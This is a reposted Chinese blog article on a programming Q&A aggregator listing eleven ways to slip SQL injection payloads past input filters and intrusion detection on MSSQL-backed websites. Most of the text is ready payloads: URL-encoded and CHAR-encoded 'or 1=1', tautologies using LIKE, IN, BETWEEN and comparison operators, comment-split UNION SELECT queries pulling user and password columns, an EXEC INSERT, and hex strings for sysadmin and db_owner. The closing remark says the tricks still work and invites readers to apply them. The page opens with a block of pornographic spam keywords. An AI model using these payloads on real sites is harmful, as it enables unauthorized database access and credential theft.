日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

网站检测之防注入绕过的十一种技巧

發布時間:2025/3/15 编程问答 26 豆豆
生活随笔 收集整理的這篇文章主要介紹了 网站检测之防注入绕过的十一种技巧 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

轉自http://hi.baidu.com/hack69/blog/item/31c5cfd9651ae63611df9b9d.html

1、運用編碼技術繞過

如URLEncode編碼,ASCII編碼繞過。

例如or 1=1即
%6f%72%20%31%3d%31

而Test也可以為

CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)

2、通過空格繞過
如兩個空格代替一個空格,用Tab代替空格等,或者刪除所有空格,如
or'' swords'' =‘swords'',由于mssql的松散性,我們可以把or ''swords'' 之間的空格去掉,并不影響運行。

3、運用字符串判斷代替
用經典的or 1=1判斷繞過,


or ''swords'' =''swords''

這個方法就是網上在討論的。

4、通過類型轉換修飾符N繞過
可以說這是一個不錯的想法,他除了能在某種程度上繞過限制,而且還有別的作用,大家自己好好想想吧。關于利用,


or ''swords'' = N'' swords''

,大寫的N告訴mssql server字符串作為nvarchar類型,它起到類型轉換的作用,并不影響注射語句本身,但是可以避過基于知識的模式匹配IDS。

5、通過+號拆解字符串繞過
效果值得考證,但畢竟是一種方法。如

or ''swords'' =‘sw'' +'' ords'' ;EXEC(‘IN'' +'' SERT INTO ''+'' …..'' )

6、通過LIKE繞過
以前怎么就沒想到呢?


or''swords'' LIKE ''sw''

顯然可以很輕松的繞過“=”“>”的限制……

7、通過IN繞過
與上面的LIKE的思路差不多,


or ''swords'' IN (''swords'')


8、通過BETWEEN繞過


or ''swords'' BETWEEN ''rw'' AND ''tw''

9、通過>或者<繞過

or ''swords'' > ''sw''
or ''swords'' < ''tw''
or 1<3
……

10、運用注釋語句繞過
用/**/代替空格,如:UNION /**/ Select /**/user,pwd,from tbluser
用/**/分割敏感詞,如:U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser

11、用HEX繞過,一般的IDS都無法檢測出來

0x730079007300610064006D0069006E00 =hex(sysadmin)
0x640062005F006F0077006E0065007200 =hex(db_owner)

PS:

以上相關技巧到現在都還是有效果的,部分方法在不同的網站程序中也都是通用的,大家可以靈活運用

轉載于:https://www.cnblogs.com/zthua/archive/2013/01/09/2853289.html

總結

以上是生活随笔為你收集整理的网站检测之防注入绕过的十一种技巧的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。